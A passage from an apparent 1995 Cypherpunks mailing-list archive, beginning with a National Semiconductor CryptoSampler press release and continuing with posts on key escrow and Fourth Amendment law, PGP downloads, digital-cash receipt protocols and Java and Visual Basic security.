package is available to the first 1,000 U. S. respondents and can be ordered directly from National's iPower Business Unit. In a related move, the company's iPower Business Unit launched its own web site along with CryptoSolver, an interactive game that invites participants to solve encrypted messages based on the concepts of substitution ciphers and the alphabetic frequency table. CryptoSolver, a technology-teaser game rates players' deciphering skills and can be downloaded from iPower's new web site free. "As networks become the lifeblood of corporations and the principal means of commerce, securing electronic transactions and proprietary information over public and private networks is absolutely critical," said Tom Rowley, marketing director for National's iPower Business Unit. "Through this program, we hope to help broaden individual's understanding of how modern security technology can solve real problems on the Internet and in Electronic Commerce business applications," Rowley explained. CryptoSampler Package - Token Plus Three Applications in One ------------------------------------------------------------ The CryptoSampler package consists of a PersonaCard 100 data security token, a floppy disk containing all three demonstration applications, a cryptography primer written by recognized cryptography expert Bruce Schneier, and a questionnaire. Customers who choose to complete and return the questionnaire, will receive a free copy, while supplies last, of Bruce Schneier's newly-released book, Applied Cryptography, second edition. o PersonaScreen(tm) System Lockout Utility is a screen locker that prevents unauthorized entry into a personal computer by locking the keyboard and mouse. The PersonaCard Token, implemented in the PC Card (formerly PCMCIA) Type II format, locks and unlocks the desktop computer. o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt, decrypt), and verify documents as well as e-mail messages from within Microsoft Word 6.0 for Windows. Installed automatically, PersonaSecure displays a toolbar that corresponds to the functions of National's PersonaCard data security token. The hardware token incorporates RSA's industry-standard digital signature and encryption formats which are now "token aware." In addition to protecting and validating Microsoft Word documents, users can encrypt and decrypt e-mail messages with others who have installed the PersonaSecure Word Utility. o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library (DLL) of routines that enables developers to quickly and easily develop their own applications incorporating high-level data security features. PersonaDLL includes a Visual BASIC application, Visual BASIC source code, and access to all of the features of the PersonaCard 100 token including digital signatures, RSA key generation, encryption, and verification. System requirements to run the CryptoSampler package are: Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot (version 2.1 or later). Microsoft Word 6.0 is required for the PersonaSecure Word Utility. Pricing and Availability ------------------------ The CryptoSampler package is available with or without a PC Card Reader. For those who plan to run CryptoSampler applications on a desktop or portable personal computer already equipped with a PC Card slot, the basic package is offered at a special price of $129 (including handling and shipping). A CryptoSampler package with PC Card reader is available for $199. The total retail value of the basic package and configuration with card reader is $300 and $500, respectively. To order the CryptoSampler package in either configuration, call 1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central Standard Time. To play CryptoSolver and for more information about the CryptoSampler program, see the iPower web site at http://www.ipsecure.com . iPower Security Solutions ------------------------- Introduced a year ago, iPower technology provides the highest-level of commercially available security in a personal, portable hardware token. iPower solutions are already being incorporated by OEMs, ISVs, and VARs into a variety of applications and hardware platforms including e-mail and messaging, electronic commerce, network security, and secure access to on-line services including the Internet. National Semiconductor Corporation provides technologies for moving and shaping information. The company focuses on four key areas - communications, consumer, industrial, and personal systems. National Semiconductor is headquartered in Santa Clara, California, and has 22,300 employees worldwide. -30- Note to Editors: To receive a CryptoSampler package for review, call or e-mail Lori Sinton, 408 721-2448 or sampler at ipower.nsc.com iPower and PersonaCard are trademarks of National Semiconductor Corporation. All other trademarks are held by their respective companies. From jsw at netscape.com Thu Dec 7 20:54:05 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 7 Dec 95 20:54:05 PST Subject: Is there a lawyer in the house? In-Reply-To: <199512080227.SAA15534@infinity.c2.org> Message-ID: <30C7C407.4117@netscape.com> Black Unicorn wrote: > > On Thu, 7 Dec 1995, sameer wrote: > > > > > You mean if you give me your key the police can get it from me without a > > > > warrant? What if I don't want to give it up, and you don't? How would the > > > > police get it without a warrant? > > > > > > Yes. Unless it could be shown there their was an expactation of privacy > > > in the transfer, or that there was an understanding that you intended this > > > to be a confidential matter. Or in the alternative, that the > > > > I do not understand. > > > > Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells > > Bob "I want Alice's key, you need to give it to me. I don't have a > > warrant." > > > > How is this different from > > Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, > > you need to give it to me. I don't have a warrant." > > The real concern is this: > > Bob gives his key to alice. > > The cops walk into alice's place and 'convince' alice to turn the key > over whithout a warant. Perhaps alice is more susceptible to > persuasion because of some external reasons. Alice does, Bob has no privacy > interest in the key, Bob can no longer argue that it is protected under > the 4th amendment. > > Now let's get more sinister. > > The cops mysteriously 'find' the key somewhere without a warrant. > Bob cannot argue that the key should be surpressed on the basis of the > 4th amendment because he gave it to Alice, and thus clearly it's not > information he was interested in protecting. (This is assuming the cops > didn't violate other areas, or break into a house or something, or that > if they did, that the court will find out about it). How about if Bob had a contractual agreement with Alice to keep his key secret? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From futplex at pseudonym.com Thu Dec 7 21:53:04 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Dec 95 21:53:04 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: <199512080554.AAA05788@opine.cs.umass.edu> Black Unicorn writes: > Yes. I have seen holdings which indicate that information given to an > employer, where there was no obvious expection that it be kept > confidential, estopped 4th amendment protections to its introduction when > obtained without a warrant. [...and...] > Again, because of the nature of the relationship. There is an > expectation that a conversation with an attorney is one of the most > private exchanges you can engage in. As for rare exceptions, I'm not so > sure I would term them rare. What happens if I disclose a key to my employer's corporate law firm ? Does that clearly lie one way or the other, or would it likely hinge upon the conditions under which I came to reveal the key ? -Futplex From sameer at c2.org Thu Dec 7 22:34:57 1995 From: sameer at c2.org (sameer) Date: Thu, 7 Dec 95 22:34:57 PST Subject: the X.9 Electronic Payments ANSI standard Message-ID: <199512080630.WAA17998@infinity.c2.org> My inquiries regarding Rich's post of the X.9 informal notes were rather fruitful. The chair of the working group seems interesting in including anonymous token-based payment systems in the standard, "I see no reason, other than interest, for the group to avoid non-account-based payment systems, to complement the account-based payment systems that we are now in the process of standardizing." Someone from Citicorp pointed me to http://www.llnl.gov/fstc and asked for my feedback. These people do seem interested in anonymous systems, they just don't have anyone who knows the stuff to work on it. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From lumisign at c031.aone.net.au Thu Dec 7 23:26:38 1995 From: lumisign at c031.aone.net.au (Nicholas Philp) Date: Thu, 7 Dec 95 23:26:38 PST Subject: (no subject) Message-ID: <199512080727.SAA19878@mail.mel.aone.net.au> WE WANT SOME PUSSY PICTURES From ecarp at netcom.com Thu Dec 7 23:26:41 1995 From: ecarp at netcom.com (Ed Carp) Date: Thu, 7 Dec 95 23:26:41 PST Subject: [NOISE] Re: FW: websurfer 4.6 Message-ID: <199512080659.AAA31407@khijol> > Date: Thu, 7 Dec 1995 15:49:09 -0600 (CST) > From: Aleph One > To: Rich Graves > Cc: cypherpunks at toad.com > Subject: Re: [NOISE] Re: FW: websurfer 4.6 > On Thu, 7 Dec 1995, Rich Graves wrote: > > [snip] > > Microsoft's strategy is to support VB. > [snip] > > -rich > > > > Its interesting to note that all the people that were raving mad about Java > seem to be quiet now that MS is proposing to use VB. At least Java was > designed from the ground up with security in mind. But VB? Actual binary Well, at least it's easy and fun to program in (if you can call drag-'n-drop "coding"). Of course, until 4.0, their setup utility didn't check what version of DLL you were installing, so it's easy to get your DLLs out of sync on your system and blow your applications all to hell, and 4.0 throws all thos OLE crap in, even if you don't need/want/use OLE in your code and makes a 300K application into a 3M one, and they won't tell you what really goes on underneath the hood (I guess they're paranoid about getting ripped off), and never mind that it's almost trivial to write a VB decompiler (the .EXE is just a big jump table into offsets into VBRUN300.DLL), etc., etc., etc... And all this from a software company that took over 10 years to make their "operating system" do preemptive *anything*. But I guess I shouldn't complain. After all, VB has made me a pretty decent living for the past year or so... From ecarp at netcom.com Thu Dec 7 23:27:16 1995 From: ecarp at netcom.com (Ed Carp) Date: Thu, 7 Dec 95 23:27:16 PST Subject: FW: websurfer 4.6 Message-ID: <199512080648.AAA30444@khijol> > Date: Thu, 7 Dec 1995 15:12:07 -0500 > Subject: Re: FW: websurfer 4.6 > To: cypherpunks at toad.com > From: Rich Graves > -----BEGIN PGP SIGNED MESSAGE----- > > On Thu, 7 Dec 1995, Anonymous wrote: > > > Not surprising. They confuse random doodling with software, too. > > > > The real problem with NetManage is a severe case of brain death. > > My, thanks for your opinion. > > It may interest you to know that Microsoft recently licensed a bunch of > stuff from NetManage (San Jose Merc, no real details given). Yeah, and they also think that Windoze is a real opearting system, too... From futplex at pseudonym.com Thu Dec 7 23:46:19 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Dec 95 23:46:19 PST Subject: Python Cryptography Toolkit v1.0.0 In-Reply-To: <9512072158.AA15573@toad.com> Message-ID: <199512080747.CAA06243@opine.cs.umass.edu> Andrew Kuchling writes: > I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a > collection of cryptographic routines for the Python programming language. > It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz. [...] > The Toolkit now contains various cryptographic algorithms such > as DES, IDEA, MD5, etc. [...] > Questions, comments, or suggestions are welcomed at the > address below. Sounds good. Here's some nitpicking: (1) If you don't mind announcing that you've exported the software from Canada to the Netherlands, why not just put it up for ftp at a Canadian site ? (2) Acronym overload: try to avoid calling your toolkit "PCT", since M$ already has some security protocol called PCT.... -Futplex From futplex at pseudonym.com Thu Dec 7 23:59:31 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Dec 95 23:59:31 PST Subject: [NOISE] WE WANT SOME PUSSY PICTURES In-Reply-To: <199512080727.SAA19878@mail.mel.aone.net.au> Message-ID: <199512080758.CAA05849@opine.cs.umass.edu> Nicholas Philp writes: > WE WANT SOME PUSSY PICTURES (Oops, soon it may be illegal for me to quote that) http://callie.csci.unt.edu/~donr/cat-pics/index.html has good shots of Bonnie, Brandy, and others. But why do you think this is relevant to c'punks ? -Futplex From leefi at microsoft.com Fri Dec 8 00:27:21 1995 From: leefi at microsoft.com (leefi at microsoft.com) Date: Fri, 8 Dec 95 00:27:21 PST Subject: Micro$oft and Java Message-ID: | The interesting thing here is a plan to use digital signatures on | controls and scripts as a means of authentication. There was a press release on this. The PR index on http://www.microsoft.com/corpinfo/pr.htm points to a few Internet-related announcements that were made on 12/7. A brief quote on these signatures: "Microsoft plans to propose the Internet digital signature specifications to the W3C and the IETF as an open Internet standard. The technology will be an open, proposed specification available to the entire Internet community. In addition, as part of the Open Process Design Review, Microsoft will host a digital signature design preview in January to solicit feedback from the Internet community." This week there was also another workshop for ~150 ISVs, and these signatures were one of the topics. The event was not under any NDA, so you should start seeing feedback once folks get home and they catch up with mail (at least two were on Cypherpunks). The folks putting on the event have put lots of docs on the "Sweeper" SDK, on the below-referenced web site. Honestly, I'm not sure if all the stuff from the event this week is up there; if not now, most of it will get added in the next week or so. | Servers and some clients will support end-to-end encryption. No details... I believe SSL in current versions of the web browser and server, PCT around the corner (perhaps PCT is earlier than I'm thinking). | Maybe I'll test the search capabilities of the MS Web site later tonight. The clearinghouse for internet developer info (opened 12/7): http://www.microsoft.com/intdev/ It contains info on various VB Script, OLE Control, etc, as they refer to some of our Internet solutions. A page related to this press briefing (I presume also opened 12/7): http://www.microsoft.com/internet/ Hope this helps, Lee Fisher (wondering if I really should've de-lurked) From ohuf at relay.sedat.de Fri Dec 8 00:33:58 1995 From: ohuf at relay.sedat.de (Oliver Huf) Date: Fri, 8 Dec 95 00:33:58 PST Subject: Solution for US/Foreign Software? In-Reply-To: <199512080313.TAA00782@ix2.ix.netcom.com> Message-ID: > or rational here.) The issue is that, unless written very carefully, > the crypto-less software is a "component of a cryptosystem", > and therefore still requires permission to export. Thanks for the hint. Oli. From adam at rosa.com Fri Dec 8 00:43:08 1995 From: adam at rosa.com (Adam philipp) Date: Fri, 8 Dec 95 00:43:08 PST Subject: Secrets (was:Is there a lawyer in the house?) Message-ID: <9512080843.AA03439@toad.com> There seems to be some confusion about what the law of the land considers a "secret." Secrets according to our laws are knowledge one doesn not share without a BINDING legal obligation to keep the secret. Remember R4.C? That was a secret until it was shared, and hence lost its privileged position as a "Trade secret." Your secret key is just as safe, so long as it is always kept out of anyone else's hands. However if you are going to provide it to someone else it should be only through some form of contract. Even this might not be sufficient in some circumstances. The only truly safe possibility would be giving it to your lawyer in the course of your lawyers representation of you. NOTE: NOT YOUR COMPANY'S LAWYER. In house council have their obligation to the company, not to you. As such if they felt your key was unrelated to company business interests and possibly adverse to the company's interest...kiss that secret good bye. Sure, the police still need a warrant to go into your house and get the key, but they do NOT need a warrant to ask anyone else for your key, if you revealed your secret to someone who does not have an obligation of confidentiality to you, then they can reveal it with impunity. The danger of revealing it to a nonlawyer who has a contract with you is that they can be forced to reveal it, and still be liable to you for breech of contract... I am sure you see the dangers...just say no to key escrow...much safer. -Adam [NOTE: I am not an attorney, this is not legal advice, you get what you pay for] --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://XXXXXXXXXXXXXXXXX/adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA... |communications are preferred for | | (see home page for definition) |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From unicorn at schloss.li Fri Dec 8 00:50:22 1995 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 8 Dec 95 00:50:22 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Thu, 7 Dec 1995, Timothy C. May wrote: > At 2:27 AM 12/8/95, sameer wrote: > >> > You mean if you give me your key the police can get it from me without a > >> > warrant? What if I don't want to give it up, and you don't? How would the > >> > police get it without a warrant? > >> > >> Yes. Unless it could be shown there their was an expactation of privacy > >> in the transfer, or that there was an understanding that you intended this > >> to be a confidential matter. Or in the alternative, that the > > > > I do not understand. > > > >Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells > >Bob "I want Alice's key, you need to give it to me. I don't have a > >warrant." > > > >How is this different from > >Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, > >you need to give it to me. I don't have a warrant." > > > > > > sheesh, what a fucked up legal system. > ^^^^^^^^^ > > EXON WARNING! This message has just exposed the author, the toad.com > system, and all those who pass it on to fines of not less than $10,000! > > But I share Sameer's confusion. If cops show up at my door, they must, it > seems to me, present proper warrants before they can _enter_ my premises, > or _search_ my premises. Something given to me, whether a letter, a key, a > photo, etc., is essentially *my property* and may not simply be taken away > from without due process. There are MANY circumstances where a presence may be searched without a search warrant per se. For example, a search of the premises incident to a lawful arrest. > > I hope Black Unicorn is incorrect in his point. > Which point? If you mean that the key is your property and not violable simply by virtue of that fact, then I have to tell you that you are over estimating the amount of protection you have. You have to demonstrate a definate expectation of privacy in the key first. Giving it to Alice tends to weaken your case in that regard. Does the fact that you have given your key to Alice mean that the police can violate OTHER protections that the 4th amendment provides, of course not. The police cannot just break down your door because you gave your key to Alice and it happens to be in your house. Alice has nothing to do with the expectation of privacy you have in your house. However, once they have their hands on the key, warrant or not, if you have not demonstrated an expectation of privacy in the item, you're not going to get Fourth amendment protections. If I am talking in the wrong direction, present me with a direct question and I will try to confine my musings to it's precise context. > --Tim > > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From unicorn at schloss.li Fri Dec 8 00:54:29 1995 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 8 Dec 95 00:54:29 PST Subject: Is there a lawyer in the house? In-Reply-To: <30C7C407.4117@netscape.com> Message-ID: On Thu, 7 Dec 1995, Jeff Weinstein wrote: > Black Unicorn wrote: > > > > On Thu, 7 Dec 1995, sameer wrote: > > > > > > > You mean if you give me your key the police can get it from me without a > > > > > warrant? What if I don't want to give it up, and you don't? How would the > > > > > police get it without a warrant? > > > > > > > > Yes. Unless it could be shown there their was an expactation of privacy > > > > in the transfer, or that there was an understanding that you intended this > > > > to be a confidential matter. Or in the alternative, that the > > > > > > I do not understand. > > > > > > Alice has Alice gives Bob her key. Cop wants Alice's key. Cop tells > > > Bob "I want Alice's key, you need to give it to me. I don't have a > > > warrant." > > > > > > How is this different from > > > Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, > > > you need to give it to me. I don't have a warrant." > > > > The real concern is this: > > > > Bob gives his key to alice. > > > > The cops walk into alice's place and 'convince' alice to turn the key > > over whithout a warant. Perhaps alice is more susceptible to > > persuasion because of some external reasons. Alice does, Bob has no privacy > > interest in the key, Bob can no longer argue that it is protected under > > the 4th amendment. > > > > Now let's get more sinister. > > > > The cops mysteriously 'find' the key somewhere without a warrant. > > Bob cannot argue that the key should be surpressed on the basis of the > > 4th amendment because he gave it to Alice, and thus clearly it's not > > information he was interested in protecting. (This is assuming the cops > > didn't violate other areas, or break into a house or something, or that > > if they did, that the court will find out about it). > > How about if Bob had a contractual agreement with Alice to keep his > key secret? Then as a defense attorney, I would argue that Bob had an obvious expectation of privacy with Alice, and that the fact that he relayed this key to Alice only under those circumstances represents a definite expression of his intent to keep the key private, thus triggering 4th amendment protections. My view is that this would be a very strong argument. Note that this is an academic opinion, not a legal one as I am not being paid. > > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From unicorn at schloss.li Fri Dec 8 00:58:15 1995 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 8 Dec 95 00:58:15 PST Subject: Is there a lawyer in the house? In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu> Message-ID: On Fri, 8 Dec 1995, Futplex wrote: > Black Unicorn writes: > > Yes. I have seen holdings which indicate that information given to an > > employer, where there was no obvious expection that it be kept > > confidential, estopped 4th amendment protections to its introduction when > > obtained without a warrant. > [...and...] > > Again, because of the nature of the relationship. There is an > > expectation that a conversation with an attorney is one of the most > > private exchanges you can engage in. As for rare exceptions, I'm not so > > sure I would term them rare. > > What happens if I disclose a key to my employer's corporate law firm ? > Does that clearly lie one way or the other, or would it likely hinge upon > the conditions under which I came to reveal the key ? This becomes highly speculative. My inclination is to say that it would hinge on the conditions under which you tendered the key to the legal department of your employer. This is a question of law, and would probably depend as much on the judge as on the circumstances. Remember, 4th amendment rulings AGAINST the prosecution are very tough for a judge to make, because they usually mean excluding evidence key to the prosecution's case, and most often they arise in circumstances where the defendant looks guilty as sin. > -Futplex --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From cactus at hks.net Fri Dec 8 01:14:03 1995 From: cactus at hks.net (The user formerly known as Leslie Todd Masco) Date: Fri, 8 Dec 95 01:14:03 PST Subject: Cyberia-L Archive [was Re: ERA_sur] Message-ID: <199512080913.EAA25980@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article you write: >As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived >on http://www.hks.net/ and the public news server nntp.hks.net. !!! As far as I know, Cyberia-L isn't accessable via http from us. Please let me know if it is...if so something's very misconfigured. The nntp part is correct, though. And a bunch of the lists might soon be added to the http archives: cypherpunks is the test message base for it. >Now send them some of the money you're going to make from the stock market. That'd be way nice... Small unmarked bills are preferred. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMgBryoZzwIn1bdtAQGB3gGA15WO7RLcosT3hrjEJN9d0H6Fk0fMu4lG E/cw+h9YZcB6Nk0jiURfceCkBSz4+JSC =TnoU -----END PGP SIGNATURE----- From futplex at pseudonym.com Fri Dec 8 01:46:38 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 8 Dec 95 01:46:38 PST Subject: digital receipts and cash In-Reply-To: <199512010408.UAA04333@quito.CS.Berkeley.EDU> Message-ID: <199512080947.EAA06459@opine.cs.umass.edu> David Wagner writes: > (Later, if the vendor reneges on the transaction, you'd have the digital > receipt to prove that you paid & the vendor is cheating you.) > > This seems like it would be a really useful feature. Does anyone know > if there are any *practical* protocols to do this? [...] > ObCrypto relevance: I've looked through _Applied Cryptography_, but the > protocols listed there aren't practical -- they require something like > 100 rounds of interaction! Can this be improved? The Even/Goldreich/Lempel protocol (ACv1, pp.101-103) requires O(k) fairly expensive operations (i.e. key generations, encryptions, network transmissions) to guarantee honesty with probability p = 2^k. k = 100 is suggested. Perhaps this protocol would be useful in many applications with k << 100. It might be argued that k need only be about O(lg(value(transaction))). I think k = 10 or 20 would be suitable for many relatively low-value digital cash transactions. Waiting a bit longer to arrange the purchase of a car over the net sounds tolerable to me. I suppose you could precompute heaps of keys for use in unspecified future transactions, which helps a bit. It's hard to imagine circumventing the basic need for incremental increases in trust, with a nontrivial cryptographic operation at each end in each round. But hey, I certainly don't expect to prove that anytime soon.... :) -Futplex From john.ellis at wmcmail.wmc.ac.uk Fri Dec 8 01:49:53 1995 From: john.ellis at wmcmail.wmc.ac.uk (john.ellis at wmcmail.wmc.ac.uk) Date: Fri, 8 Dec 95 01:49:53 PST Subject: PGP Message-ID: <9511088184.AA818445140@wmcmail.wmc.ac.uk> Does anyone have the source code for PGP (DOS) not Unix, ______________________________ Reply Separator _________________________________ Subject: PGP Author: Daniel 'genius' Charpentier at internet Date: 06/12/95 18:29 -----BEGIN PGP SIGNED MESSAGE----- I've tried to find out the answers to my questions myself but I haven't been very successful. Actually, I haven't been successful at all. First of all, I've been using PGP on my computer but when I tried to port it over to my unix account it didn't work. I took the source code and tried to compile it using the unix g++ compiler but it gave me all of these errors. Where can I find PGP that is already compiled for unix or at the very least will compile for unix? Secondly, if I create a program that makes using PGP more user friendly can I let other people have it ( for FREE )? Lastly, what is considered overkill with cryptography? I don't believe anything is. My programs accept what the user inputs for how large prime numbers should be ( my public key programs ) but I make them able to accept values that go up to 30720 bits ( I don't believe a number can ever be large enough ). You can never be to safe...never. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMXVhDMGe42brZbVAQEo/Qf7BSshqKJAmxVzyGSyAp2Qkj+/dqh1Zon1 xDqMnvU6ihLimHZ/uXGiQE2jM6N8FRbYu7psQ/iPJ+gX5/VKfrxlxjCfDM0Jx2s9 vucgMQz1KYbELA8Fo1QUEsDuTMzJ80VoTicXfZZmILhr7cBJH4pHa5RgkgrS2Lun iodQ+F7BXdio86TnctQgoKJ+78qOYDuV4Vfha/a290ZoZmPRcqArYv7tU6X3KMjf DGxqgugiwpHnkTO1B9wypoePbbJZSNzFYYvZKMI8Ntg7yFkMl/lSxcLh6oYq0ACe R9NfZR9x11H/fIrn8HZlq0Q86OptWhZz53p77VNN+sVZJOktHJIWqg== =WK6x -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Fri Dec 8 02:06:17 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 8 Dec 95 02:06:17 PST Subject: Is there a lawyer in the house? In-Reply-To: <30C8177F.47AF@goldenbear.com> Message-ID: <199512081002.AA01851@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Timothy C. May wrote: > Sameer Parekh writes: > >How is this different from > >Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key, > >you need to give it to me. I don't have a warrant." > > > But I share Sameer's confusion. If cops show up at my door, they must, it > seems to me, present proper warrants before they can _enter_ my premises, > or _search_ my premises. Something given to me, whether a letter, a key, a > photo, etc., is essentially *my property* and may not simply be taken away > from without due process. What's important here is the difference between things and information - if the cops want to get *things* in your possession, they need a warrant or consent or exigent circumstances or whatever. If they want to get *information* in your possession, they can subpoena you and make you talk (or show them the papers/records/whatever, modulo the Fifth amendment, modulo immunity). Either way, the standard for due process (essentially nothing for a subpoena - "more likely than not will lead to the discovery of fruits of/evidence of a crime" for a warrant) is pretty minimal. But, it's worse than that: as a matter of federal law, if I write "I, Greg Broiles, killed Jimmy Hoffa and hid his body in one of the concrete columns used to construct Giants Stadium", and give that piece of paper to you, and cops search your house illegally and find that scrap of paper, the information on the paper (if not the paper itself) can be used against me, even though it was found in an illegal search. I wouldn't have "standing" (e.g., a legal basis to contest the search) because federal law doesn't think I have a privacy interest in the stuff in your house. I think that's the tricky bit behind the idea that there's no (personal) expectation of privacy where a key is given to an escrow agent - the standing requirement. State constitutions and statutes may provide a higher level of protection - Oregon's constitution, for example, is interpreted to be more generous re who's got standing to contest the legality of a search. It occurs to me that the owner of the key might have a good argument that they've got "third party standing", where they can essentially adopt the position of the key's owner, because the key's owner is in a position such that they can't do a good job of representing their own interests, and the third party will. (e.g., the doctor(?) in _Eisenstadt v. Baird_) The owner of the key (at least if they're anonymous, and the key server is served with a subpoena to "disclose the 'true name' of the owner of key 0x58ddf30d") may wish to avoid revealing hirself. Hmm. That, of course, assumes that the escrow holder feels like fighting the subpoena - perhaps that's something to look for when you go escrow shopping. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMgNC33YhjZY3fMNAQGPPQP+M7IFM/DgfEf6z5f8YUoBHo+aXPfTzwtf xee1SPkJOxfH7dYaUIKs7JDAKxOGTaNdrlJjrMno7yHVFVHq6R7wRw8jOPUXhJ3C VZ94LpTqNF6OPPoD+pr2MFG+SaFLl7JyS16Kbe9ilUE5cG6N2hToUibSjwyz3BKc R95RR9TkRzs= =4jN1 -----END PGP SIGNATURE----- From Piete.Brooks at cl.cam.ac.uk Fri Dec 8 02:12:41 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Fri, 8 Dec 95 02:12:41 PST Subject: PGP In-Reply-To: <9511088184.AA818445140@wmcmail.wmc.ac.uk> Message-ID: > Does anyone have the source code for PGP (DOS) not Unix, You should be able to use http://www.pgp.net/pgp/ or ftp:ftp.pgp.net to find what you need - DOS is under pc ... dos directory DOS [1]Up to pc Jul 6 15:03 Zip File [2]pg262uis.zip 521Kb Jul 6 13:37 Zip File [3]pg262uix.zip 228Kb Nov 7 1994 Zip File [4]pgp262.zip 276Kb May 9 1995 Zip File [5]pgp262i.zip 272Kb May 9 1995 Zip File [6]pgp262is.zip 568Kb Jul 16 13:21 Zip File [7]pgp262ix.zip 419Kb Apr 4 1995 Zip File [8]pgp262s.zip 643Kb Oct 19 1994 Zip File [9]pgp26i.zip 251Kb Oct 19 1994 Zip File [10]pgp26is.zip 603Kb Sep 19 1994 Zip File [11]pgp26uis.zip 510Kb May 11 1995 Zip File [12]pgpmnu20.zip 45Kb Sep 19 1994 Zip File [13]pgpshe32.zip 108Kb Sep 19 1994 Zip File [14]pgs099e.zip 65Kb From frissell at panix.com Fri Dec 8 02:44:42 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Dec 95 02:44:42 PST Subject: Geodesic Payment Systems? Message-ID: <2.2b8.32.19951208104734.00878b10@panix.com> At 04:40 PM 12/7/95 -0500, Nathaniel Borenstein wrote: >None at all, if you can find an underwriter who is comfortable with the >fact that his investigative options will be limited in the case of >suspiciously large or suspiciously frequent "cash out" events from a >given customer. Apparently Mark Twain Bank finds that risk acceptable. >I'm sure the larger banks will be watching quite closely. I seem to remember from my favorite Law School class -- Commercial Paper -- that banks weren't liable if they paid out an account from cleared funds under the terms of the account. A bank is responsible for payments made on a forged drawer's signature and anyone who accepts an instrument from a forged endorser eats the loss. But online clearing with digital signatures makes it hard to forge the drawer's signature and digital cash doesn't have the sort of endorsement system used on paper checks. DCF From anonymous-remailer at shell.portal.com Fri Dec 8 02:45:47 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 8 Dec 95 02:45:47 PST Subject: [NOISE] Re: FW: websurfer 4.6 Message-ID: <199512081045.CAA09807@jobe.shell.portal.com> On Thu, 7 Dec 1995, Ed Carp wrote: > > On Thu, 7 Dec 1995, Rich Graves wrote: > > > > Its interesting to note that all the people that were raving mad about > > Java seem to be quiet now that MS is proposing to use VB. At least Java > > was designed from the ground up with security in mind. But VB? Java was not designed from the ground up with security in mind. Not by a long shot. It was an incubator project. I know that. And the Java team knows that as well. And the ones who WERE raving about Java -- myself and others -- might simply be attempting to speak to Sun through some non-public channels. I, as an example, have tried to speak with my local Sun software manager, Warren Strange, about Java and voice some of my concerns, that way. (Yep, that's his name ... "STRANGE" ... what else would you expect with a company who's Canadian subsidiary is run by an "Everett", and who has a Vice-President named "Tribble".) Mind you ... I got absolutely _nowhere_ with Mr. Strange. I think he said that James Gosling was WAY too busy (as was he), and that the last time he had checked Gosling had 800 email messages in his mailbox, and that I should probably post my questions to comp.lang.java, if I expected any answers. I really 